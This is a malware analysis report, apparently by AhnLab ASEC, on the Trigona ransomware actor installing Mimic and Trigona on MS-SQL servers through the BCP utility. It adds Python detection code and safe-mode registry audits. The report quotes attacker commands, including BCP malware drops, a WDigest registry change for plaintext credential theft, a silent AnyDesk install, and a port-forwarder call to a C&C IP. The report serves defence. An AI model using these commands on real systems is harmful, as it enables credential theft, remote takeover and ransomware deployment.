Trigona Ransomware Threat Actor Uses Mimic Ransomware
AhnLab SEcurity intelligence Center (ASEC) has recently identified new activity by the Trigona ransomware threat actor, who is now also installing Mimic ransomware. As in past cases, the recently detected attacks target MS-SQL servers; they are notable for abusing the Bulk Copy Program (BCP) utility that ships with MS-SQL to write the malware to disk during the installation process.
- Trigona ransomware: Known to have been active since at least June 2022 [1]; usually targets MS-SQL servers for attacks and is still active.
- Mimic ransomware: First found in June 2022 [2]. In January 2024, a case was identified where a Turkish-speaking threat actor attacked poorly managed MS-SQL servers and installed Mimic [3].
ASEC first observed BCP being used to install Mimic in early January 2024. In mid-January 2024, similar attacks were identified in which Trigona was installed instead of Mimic. The email address in Mimic’s ransom note has not been seen in other attacks, but the Trigona ransom note identified later contained an email address that the Trigona threat actor has been using since early 2023 [4].
Accordingly, the attack detected in mid-January 2024 is attributed to the known Trigona threat actor, who is also believed to be behind the Mimic attack discovered in early January 2024. The attribution rests on the facts that both cases targeted poorly managed MS-SQL servers, both used BCP to install the malware, the strings and paths used in the attacks were identical, and the same supporting malware (the launcher and port forwarder described in section 4) was used in each case.
1. Trigona Ransomware
Trigona ransomware is developed in Delphi and uses RSA and AES when encrypting files. A report by Arete in February 2023 confirmed a case of Trigona exploiting the Zoho ManageEngine ADSelfService Plus vulnerability (CVE-2021-40539) for initial access [5]. In April 2023, AhnLab’s ASEC Blog covered a case where it targeted poorly managed MS-SQL servers [6].
As in the 2023 cases, MS-SQL servers were targeted again in the recent attack, and the email address in the ransom note confirms that the threat actor behind the recently detected Trigona ransomware is the same one responsible for the earlier cases.
- Email: farusbig@tutanota[.]com
- URL: hxxp://znuzuy4hkjacew5y2q7mo63hufhzzjtsr2bkjetxqjibk4ctfl7jghyd[.]onion/

Figure 1. Encrypted files and a ransom note
2. Mimic Ransomware
Mimic ransomware is known for abusing Everything, a legitimate file-search utility, to locate the files it will encrypt; the threat actor presumably relies on it to speed up file enumeration, and therefore encryption, on the target system. The developer also borrowed some features from the leaked Conti ransomware source code [7].
The Mimic samples described in Trend Micro’s January 2023 report and Securonix’s January 2024 report have almost the same outer structure as the sample used in this attack. The malware is packaged as a 7z SFX executable that carries a password-protected archive named “Everything64.dll”, which contains the actual malware components and the Everything tool. When the malware runs, the 7z and “Everything64.dll” archives are extracted with the bundled 7za.exe using the embedded passwords, as shown below.
> 7za.exe x -y -p58042791667523172 Everything64.dll
> 7za.exe x -y -p624417568130113444 Everything64.dll

Figure 2. Files included in 7z SFX and the compressed file
The folder that is ultimately extracted contains not only the Mimic ransomware and the Everything tool but also Defender Control (DC.exe), used to disable Windows Defender, and Sysinternals SDelete (renamed xdel.exe), a secure-deletion tool.

Figure 3. Installed files
The threat actor’s email address in the ransom note differs from those in the Mimic samples covered by the January 2023 Trend Micro report and the January 2024 Securonix report, and it has not been found in other attack cases either. Nevertheless, based on the circumstances discussed later in this post, the Trigona ransomware threat actor is presumed to be using Mimic in their attacks as well.
- Email: getmydata@list.ru

Figure 4. Encrypted files and a ransom note
3. Malware Installed Using BCP
The targets are assessed to be poorly managed, externally exposed MS-SQL servers with weak account credentials, which leaves them vulnerable to brute-force and dictionary attacks. This is inferred not only from the Trigona threat actor’s history of targeting such systems, but also from infection logs of other malware, including LoveMiner and Remcos RAT, found on the same servers before and after the attacks described here.
3.1. Files Created Using BCP
The BCP utility (bcp.exe) is a command-line tool for bulk-copying large volumes of data between a SQL Server instance and a data file. It is typically used to export the contents of a table or query to a local file, or to import a local data file into a table.
Threat actors that target MS-SQL servers typically use PowerShell commands to download malware from an external server. Recently, some have been abusing SQLPS, the PowerShell module bundled with SQL Server [8]. In this case, however, the threat actor most likely stored the malware in a database table and used BCP to write it out as a local file, so the binary reaches the host over the existing SQL connection rather than through a separate download.

Figure 5. Creating malware using BCP
The threat actor ran the following command to export the Trigona binary from “uGnzBdZbsi”, the table that held it, to a local path. “-T” makes BCP use a trusted (Windows-authenticated) connection, and “-f FODsOZKgAU.txt” points to a BCP format file, which is thought to describe the column layout so that the binary column is written out as a raw file.

Figure 6. BCP command used in the attacks
The following are BCP commands used to export various malware and tools used in the attacks.
- AnyDesk
> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\%ASD%\music\AD.exe" -T -f "C:\users\%ASD%\music\FODsOZKgAU.txt"
- Port forwarder malware
> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\%ASD%\music\4.exe" -T -f "C:\users\%ASD%\music\FODsOZKgAU.txt"
- Launcher malware
> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\pp2.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"
> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\%ASD%\music\pp2.exe" -T -f "C:\users\%ASD%\music\FODsOZKgAU.txt"
- Mimic ransomware
> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\K2K.txt" -T -f "C:\ProgramData\FODsOZKgAU.txt"
> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\%ASD%\K3K.txt" -T -f "C:\users\%ASD%\FODsOZKgAU.txt"
- Trigona ransomware
> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\%ASD%\music\build.txt" -T -f "C:\users\%ASD%\music\FODsOZKgAU.txt"
- Others
> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\kkk.bat" -T -f "C:\ProgramData\FODsOZKgAU.txt"
> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\kur.bat" -T -f "C:\ProgramData\FODsOZKgAU.txt"
> bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\%ASD%\music\kkk.bat" -T -f "C:\users\%ASD%\music\FODsOZKgAU.txt"
3.2. Looking Up Information
Before writing the malware with BCP, that is, once a login had succeeded, the threat actor first ran the following commands to profile the infected system. The malware installed afterwards is chosen to fit the environment revealed by these commands.
> hostname
> whoami
> wmic computersystem get domain
> wmic computersystem get totalphysicalmemory
3.3. Stealing Account Credentials
The Trigona threat actor is known to use Mimikatz to steal account credentials [9] [10]. No Mimikatz execution was logged in this attack, but the attacker sometimes ran the following command to set the UseLogonCredential value so that the WDigest security package keeps plain-text passwords in LSASS memory. The setting only affects logons that occur after it is changed, so it is normally followed by a later credential dump; on Windows 8.1 / Server 2012 R2 and later the value is absent (treated as 0) by default, so finding it set to 1 is a strong indicator of credential-theft preparation.
> REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest" /v UseLogonCredential /t REG_DWORD /d 0x00000001
3.4. AnyDesk
In addition, the threat actor installed AnyDesk to control the infected system. AnyDesk is a remote administration tool that offers remote desktop, file transfer and similar features; once installed, it gives the operator interactive GUI control of the host in much the same way as RDP.
AnyDesk is widely abused not only by the Trigona ransomware actor but by many threat groups. Because such tools are also used for legitimate purposes such as remote work and remote management, security products cannot simply detect and block them the way they block typical malware. Threat actors take advantage of this by installing a remote administration tool instead of RAT-type malware during initial access or lateral movement. The commands below install AnyDesk silently into Program Files (x86) and then query the AnyDesk ID that the attacker needs in order to connect.
> %SystemDrive%\users\%ASD%\music\AD.exe --install C:\"Program Files (x86)"\ --silent
> %SystemDrive%\"Program Files (x86)"\AnyDesk-ad_1514b2f9.exe --get-id
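As an added example (not code from ASEC’s post and not the threat actor’s tooling), the following Python hunting logic turns the command lines observed in sections 3.1 to 3.4 into detection rules and runs them over a handful of constructed process-creation events. The suspicious command lines are the ones quoted above; the process ancestry chains (cmd.exe under sqlservr.exe) and the benign SQL Agent export at the end are assumptions made for the example.

```python
import re
import shlex
from pathlib import PureWindowsPath

# Constructed process-creation events (Sysmon EID 1 / EDR style), not real telemetry.
# The command lines are the ones quoted in the write-up; the ancestry chains and the
# benign SQL Agent job at the end are assumptions made for this example.
SAMPLE_EVENTS = [
    {"cmd": r'bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\K2K.txt" -T -f "C:\ProgramData\FODsOZKgAU.txt"',
     "ancestry": ["cmd.exe", "sqlservr.exe"]},
    {"cmd": r'bcp "select binaryTable from uGnzBdZbsi" queryout "C:\users\%ASD%\music\AD.exe" -T -f "C:\users\%ASD%\music\FODsOZKgAU.txt"',
     "ancestry": ["cmd.exe", "sqlservr.exe"]},
    {"cmd": r'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest" /v UseLogonCredential /t REG_DWORD /d 0x00000001',
     "ancestry": ["cmd.exe", "sqlservr.exe"]},
    {"cmd": r'C:\users\%ASD%\music\AD.exe --install "C:\Program Files (x86)" --silent',
     "ancestry": ["cmd.exe", "sqlservr.exe"]},
    {"cmd": r'bcp "select * from dbo.Orders" queryout "E:\exports\orders.dat" -T -n',
     "ancestry": ["cmd.exe", "sqlagent.exe"]},
]

# Locations where a legitimate BCP export is unlikely but every drop in the write-up landed.
SUSPECT_DIRS = (r"c:\programdata", r"c:\users", r"c:\windows\temp")
EXEC_EXTS = {".exe", ".dll", ".bat", ".cmd", ".ps1", ".vbs", ".scr"}
# REG ADD ... wdigest ... /v UseLogonCredential ... /d 1 (or 0x00000001)
WDIGEST_RE = re.compile(r"wdigest.*uselogoncredential.*/d\s+(?:0x)?0*1\b", re.I)


def tokens(cmdline):
    """Split a Windows command line; posix=False keeps backslashes, quotes are stripped after."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def queryout_target(cmdline):
    """Output path of a `bcp ... queryout <path>` command, or None if this is not one."""
    toks = tokens(cmdline)
    if not toks or PureWindowsPath(toks[0]).name.lower() not in ("bcp", "bcp.exe"):
        return None
    low = [t.lower() for t in toks]
    if "queryout" not in low:
        return None
    i = low.index("queryout")
    return toks[i + 1] if i + 1 < len(toks) else None


def check_event(event):
    """Return [(rule, detail), ...] for one event; an empty list means nothing matched."""
    cmd, findings = event["cmd"], []
    target = queryout_target(cmd)
    if target:
        path = PureWindowsPath(target)
        if path.suffix.lower() in EXEC_EXTS:
            findings.append(("bcp_drop_executable", target))
        elif str(path).lower().startswith(tuple(d + "\\" for d in SUSPECT_DIRS)):
            findings.append(("bcp_drop_writable_dir", target))
    if WDIGEST_RE.search(cmd):
        findings.append(("wdigest_plaintext_creds", "UseLogonCredential set to 1"))
    lower = cmd.lower()
    if "--install" in lower and "--silent" in lower:      # AnyDesk's unattended install flags
        findings.append(("silent_install", tokens(cmd)[0]))
    # Any hit is far more serious when the chain starts at the SQL engine: that is what
    # command execution through the database (xp_cmdshell and similar) looks like.
    if findings and any(a.lower() == "sqlservr.exe" for a in event.get("ancestry", [])):
        findings.append(("spawned_by_sqlservr", " > ".join(event["ancestry"])))
    return findings


def scan(events):
    """Run check_event over a batch; returns [(index, findings)] for events that matched."""
    hits = []
    for i, event in enumerate(events):
        findings = check_event(event)
        if findings:
            hits.append((i, findings))
    return hits


if __name__ == "__main__":
    for i, findings in scan(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['cmd'][:60]}...")
        for rule, detail in findings:
            print(f"    {rule}: {detail}")
```

The BCP rule keys on `queryout` together with the destination path rather than on bcp.exe alone, because `bcp ... out`/`in` jobs to a data share are routine in ETL environments; the parent-process rule only adds weight, since execution through the database is visible only if your telemetry records ancestry. `%ASD%` is the anonymised user-name placeholder used in the write-up and is left as-is in the sample.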
4. Analysis of Malware Used in the Attack
Besides using BCP, another notable fact for the recent attack cases confirmed is that there is evidence of safe mode being utilized. Two additional malware deemed to have been created by the threat actor were also found in the Mimic and Trigona ransomware attacks.
One is a launcher that registers itself as a service that can run even in safe mode. When it is run as a service, it executes the program given as an argument. The other is a port forwarder malware which, like the launcher, registers itself as a service that can be run in safe mode. It then activates RDP and supports RDP port forwarding to the address given as an argument.
According to the PDB information, the threat actor named the launcher malware “app2” and the port forwarder “client”.

Figure 7. Malware strains created by the threat actor with similar PDB information
Although no malware or command log that set the boot option to safe mode was found, logs of the MS-SQL server process running the system restart command below were identified. Since the launcher clears the safe-mode boot option after executing the malware given as an argument, the threat actor most likely installed the malware, rebooted the system into safe mode (where most security products and non-essential services are not loaded) to run the ransomware, and then let the system return to a normal boot.
> shutdown -r -f -t 5
4.1. Launcher Malware
The threat actor executed the launcher malware with the argument shown below. Upon execution, the launcher copies itself into the “C:\windows\temp\LeVfeNXHoa” path. It then carries out the next task according to the given argument. The first argument gives the service name and the second argument gives the path of the file to be copied. The file in the path given by the second argument is moved to the path given by the third argument. The file given through the second argument was the Mimic ransomware.
> %ALLUSERSPROFILE%\pp2.exe 1111111 c:\programdata\K2K.txt c:\programdata\2K.EXE
The launcher registers itself as a service under the name “1111111” which was given as the first argument and runs additional tasks to allow itself to be run in safe mode. Afterward, it executes the ransomware in the path given as the third argument while running as a service. When the process is complete, it deactivates the safe mode option, allowing the system to be booted up normally again.

Figure 8. Routine of setting the safe mode option for the registered service and deactivating this option after executing the ransomware
4.2. Port Forwarder
The threat actor executed the port forwarder malware with the arguments shown below. Port forwarding relays data arriving on one port to another port or host; this malware forwards traffic to the RDP service on port 3389. RDP port-forwarding tools are generally used because the threat actor cannot initiate a connection from outside to a host behind NAT or a firewall.
The port forwarder first connects out to the threat actor’s address (a reverse connection), then connects to the RDP port of the infected system and relays data between the two connections. This gives the threat actor an RDP session to the target even when it sits behind NAT, allowing remote control of the infected system. Because it relies on RDP, the malware also runs the commands shown in Figure 9 to enable the RDP service.

Figure 9. RDP service activation routine
When the port forwarder is executed in installation mode, it copies itself into the “C:\windows\temp\WindowsHostServicess.exe” path and registers itself as a service under the name “WindowsHostServicess”. The service is configured so that it can be run in safe mode like the launcher malware above.
> %SystemDrive%\users\%ASD%\music\4.exe --ip "2.57.149[.]233" --port "3366" --install
The port forwarder has five arguments. Three of these are modes that support the installation, uninstallation, and execution features. In execution mode, it does not go through the service installation process mentioned above and instead connects to the C&C server given as an argument to support port forwarding.
| Argument | Description |
|---|---|
| --install | Installation mode |
| --uninstall | Uninstallation mode |
| --run | Execution mode |
| --ip | C&C server’s IP address |
| --port | C&C server’s port number |
Table 1. Port forwarder arguments
Before connecting to the C&C server, it saves basic system information such as the OS info and user and computer names in the “C:\windows\temp\elZDk6geQ8” path, transmitting the information upon the initial connection.

Figure 10. System information forwarded to the C&C server
It then acts on the commands it receives from the C&C server: start port forwarding, or delete itself.
| Command | Feature |
|---|---|
| 0x8CC03FAF | Start port forwarding between the C&C server and the RDP service |
| 0x0002C684 | Auto-delete |
Table 2. Port forwarder C&C commands
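Both the launcher (section 4.1) and the port forwarder (section 4.2) register services that Windows will start in safe mode, which is done by creating a subkey under HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal (or \Network) whose default value is “Service”. As an added example (not ASEC’s code and not the malware’s), the Python below parses a `reg export` of the SYSTEM hive and flags safe-mode services that are not on an allowlist or that run from a user-writable directory. The .reg text is constructed for this example from the service names and paths quoted in the post; placing WindowsHostServicess under SafeBoot\Network, the allowlist contents and the Defender ImagePath with a `<version>` placeholder are assumptions.

```python
# Assumed allowlist for this example: generate it from a clean reference host of the
# same Windows build rather than hand-maintaining it; this is NOT a complete default set.
EXPECTED_SAFEBOOT_SERVICES = {"windefend", "eventlog", "cryptsvc", "dcomlaunch", "rpcss"}
SAFEBOOT_ROOTS = (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal",
                  r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network")
SERVICES_ROOT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
WRITABLE_PREFIXES = (r"c:\windows\temp", r"c:\users", r"c:\programdata")

# Constructed .reg text: the service names and paths are those quoted in sections 4.1 and
# 4.2; the SafeBoot\Network placement of the forwarder and the Defender entry are assumptions.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\1111111]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WindowsHostServicess]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend]
"ImagePath"="\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\<version>\\MsMpEng.exe\""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\1111111]
"Start"=dword:00000002
"ImagePath"="C:\\windows\\temp\\LeVfeNXHoa"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsHostServicess]
"ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,64,00,6f,00,77,00,73,00,5c,00,\
  74,00,65,00,6d,00,70,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,00,48,00,6f,00,\
  73,00,74,00,53,00,65,00,72,00,76,00,69,00,63,00,65,00,73,00,73,00,2e,00,65,00,78,00,\
  65,00,00,00
"""


def parse_reg_export(text):
    """Parse the subset of .reg syntax that `reg export` emits.

    Handles [key] headers, "name"="string", "name"=dword:xxxxxxxx and
    "name"=hex(2):.. (REG_EXPAND_SZ as UTF-16LE bytes, possibly wrapped over
    several lines with trailing backslashes). Returns {key_path: {value_name: value}};
    the default value is stored under "@". Other value types are kept as raw text.
    """
    lines = []
    for raw in text.splitlines():
        line = raw.strip()
        if lines and lines[-1].endswith("\\"):          # continuation of a hex list
            lines[-1] = lines[-1][:-1] + line
        else:
            lines.append(line)
    keys, current = {}, None
    for line in lines:
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        name, _, rhs = line.partition("=")
        name = "@" if name == "@" else name.strip('"')
        if rhs.startswith('"'):                          # REG_SZ: \\ and \" are escaped
            value = rhs[1:-1].replace("\\\\", "\\").replace('\\"', '"')
        elif rhs.startswith("dword:"):
            value = int(rhs[6:], 16)
        elif rhs.startswith("hex(2):"):                  # REG_EXPAND_SZ, NUL-terminated UTF-16LE
            value = bytes.fromhex(rhs[7:].replace(",", "")).decode("utf-16-le").rstrip("\x00")
        else:
            value = rhs
        keys[current][name] = value
    return keys


def audit_safeboot(keys):
    """Flag safe-mode service registrations that are unexpected or run from writable paths."""
    ci = {k.lower(): v for k, v in keys.items()}        # registry paths are case-insensitive
    findings = []
    for key, values in keys.items():
        root = next((r for r in SAFEBOOT_ROOTS if key.lower().startswith(r.lower() + "\\")), None)
        if root is None or str(values.get("@", "")).lower() != "service":
            continue                                    # drivers and driver groups: out of scope
        name = key.rsplit("\\", 1)[1]
        if name.lower() in EXPECTED_SAFEBOOT_SERVICES:
            continue                                    # e.g. WinDefend, which runs from ProgramData
        boot_mode = root.rsplit("\\", 1)[1]
        image = str(ci.get((SERVICES_ROOT + "\\" + name).lower(), {}).get("ImagePath", "")).strip('"')
        findings.append(f"unexpected safe-mode service {name} under {boot_mode} (ImagePath={image or 'unknown'})")
        if image.lower().startswith(WRITABLE_PREFIXES):
            findings.append(f"{name} runs from a user-writable location: {image}")
    return findings


if __name__ == "__main__":
    for finding in audit_safeboot(parse_reg_export(SAMPLE_REG)):
        print(finding)
```

Run it against an export collected from the host (`reg export HKLM\SYSTEM out.reg`, or an offline SYSTEM hive converted to .reg text). Keep the allowlist generated from a clean reference build of the same Windows version rather than hand-maintained, because the legitimate set varies between builds; it is consulted before the path check because Defender itself legitimately runs MsMpEng.exe from under C:\ProgramData, which would otherwise trip the writable-location rule.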
5. Conclusion
Recently, the Trigona ransomware threat actor has been installing the Mimic and Trigona ransomware on poorly managed MS-SQL servers. It has been found that the attacker also attempted to use malware for port forwarding to establish an RDP connection to the infected system and control it remotely.
Ransomware threat actors not only encrypt infected systems but also steal sensitive information and threaten to leak it in order to pressure victims into paying. Because they employ various techniques for credential theft and lateral movement, not just the initial system but the entire internal network may be compromised, with sensitive data stolen and systems across the network encrypted.
Typical attacks on MS-SQL servers begin with brute-force or dictionary attacks against systems whose account credentials are poorly managed. Administrators must use passwords that cannot be easily guessed and change them periodically to protect database servers from such attacks.
AhnLab V3 should also be kept up to date to block malware infections in advance. For database servers reachable from outside, administrators should restrict access with firewalls and similar controls, and should disable OS command-execution features of SQL Server (such as xp_cmdshell) where they are not required, since that is the kind of capability an attacker needs in order to run BCP on the server. Without these measures, repeated infections by threat actors and malware are likely.
File Detection
– Trojan/Win.Generic.R531737 (2022.10.27.00)
– HackTool/Win.DefenderControl.C5481630 (2023.09.06.00)
– Ransomware/Win.Mimic.C5543473 (2023.11.18.01)
– Ransomware/Win.Filecoder.C5561780 (2023.12.12.01)
– Trojan/Win.Agent.C5574264 (2024.01.14.03)
– Trojan/Win.Agent.C5574265 (2024.01.14.03)
Behavior Detection
– Malware/MDP.Minipulate.M71
– Persistence/MDP.AutoRun.M203
– DefenseEvasion/MDP.ModifyRegistry.M1234
– Ransom/MDP.Decoy.M1171
– CredentialAccess/MDP.Mimikatz.M4367